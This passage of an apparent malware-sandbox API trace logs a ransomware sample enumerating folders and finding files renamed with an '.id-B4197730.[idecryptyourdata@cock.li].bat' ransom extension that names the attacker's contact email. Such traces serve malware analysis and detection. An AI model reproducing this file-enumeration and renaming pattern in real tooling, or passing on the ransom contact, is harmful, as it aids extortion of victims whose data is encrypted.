lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x727f48 [0156.228] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0156.228] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdcb48ae, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdcb48ae, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdd259f9, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1994, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0156.228] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdd0ddaa, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdd0ddaa, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdea314b, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xee96, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0156.228] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd77c0d5, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd77c0d5, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd7a2240, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0156.228] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd77c0d5, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd77c0d5, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd7a2240, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0156.228] FindClose (in: hFindFile=0x727f48 | out: hFindFile=0x727f48) returned 1 [0156.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0156.229] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="3082", cAlternateFileName="")) returned 1 [0156.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0156.229] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x728308 [0156.231] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0156.231] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdd259f9, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdd259f9, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdec93ef, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xce4, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0156.232] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdd4bcc1, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdd4bcc1, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdeef566, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x13976, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0156.232] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd8d361e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd8d361e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd8f989f, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0156.232] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd8d361e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd8d361e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd8f989f, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0156.232] FindClose (in: hFindFile=0x728308 | out: hFindFile=0x728308) returned 1 [0156.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0156.233] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="Client", cAlternateFileName="")) returned 1 [0156.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0156.233] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x7280c8 [0156.242] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0156.242] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfddbe406, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfddbe406, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdeef566, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x31546, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="Parameterinfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="PARAME~1.BAT")) returned 1 [0156.242] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdec93ef, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdec93ef, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdffa6eb, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x9978, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="UiInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="UIINFO~1.BAT")) returned 1 [0156.242] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdec93ef, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdec93ef, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdffa6eb, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x9978, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="UiInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="UIINFO~1.BAT")) returned 0 [0156.242] FindClose (in: hFindFile=0x7280c8 | out: hFindFile=0x7280c8) returned 1 [0156.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0156.243] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdec93ef, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdec93ef, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe020920, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3ff4, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="DHtmlHeader.html.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="DHTMLH~1.BAT")) returned 1 [0156.244] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd8f989f, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd8f989f, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd91f985, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x15ad2, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="DisplayIcon.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="DISPLA~1.BAT")) returned 1 [0156.244] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="Extended", cAlternateFileName="")) returned 1 [0156.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0156.244] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x728008 [0156.246] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0156.246] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdeef566, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdeef566, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdfd443d, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x16d86, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="Parameterinfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="PARAME~1.BAT")) returned 1 [0156.246] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdf15942, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdf15942, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdffa6eb, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x9978, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="UiInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="UIINFO~1.BAT")) returned 1 [0156.246] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdf15942, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdf15942, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdffa6eb, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x9978, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="UiInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="UIINFO~1.BAT")) returned 0 [0156.246] FindClose (in: hFindFile=0x728008 | out: hFindFile=0x728008) returned 1 [0156.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0156.247] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="Graphics", cAlternateFileName="")) returned 1 [0156.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44e0058 [0156.247] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x728308 [0156.249] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0156.250] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdac340c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdac340c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdac340c, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="Print.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="PRINTI~1.BAT")) returned 1 [0156.250] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfda77999, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfda77999, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfda77999, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="Rotate1.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="ROTATE~1.BAT")) returned 1 [0156.250] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfda77999, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfda77999, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfda9d258, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="Rotate2.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="ROTATE~2.BAT")) returned 1 [0156.251] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfda9d258, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfda9d258, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfda9d258, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="Rotate3.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="ROTATE~3.BAT")) returned 1 [0156.251] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdb0f91e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdb0f91e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdb0f91e, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="Rotate4.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="ROTATE~4.BAT")) returned 1 [0156.251] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdb0f91e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdb0f91e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdb35ae9, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="Rotate5.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="ROB7C7~1.BAT")) returned 1 [0156.251] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdb5be49, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdb5be49, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdb5be49, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="Rotate6.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="ROA446~1.BAT")) returned 1 [0156.251] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdbce539, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdbce539, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdbce539, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="Rotate7.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="ROEED7~1.BAT")) returned 1 [0156.251] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdbf4763, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdbf4763, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdc1aa71, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="Rotate8.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="RO434F~1.BAT")) returned 1 [0156.251] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdc1aa71, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdc1aa71, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdc40cc8, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x564, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="Save.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SAVEIC~1.BAT")) returned 1 [0156.252] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdc40cc8, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdc40cc8, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe046b78, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x9056, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="Setup.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPI~1.BAT")) returned 1 [0156.252] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdfae1c2, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdfae1c2, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdfae1c2, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, 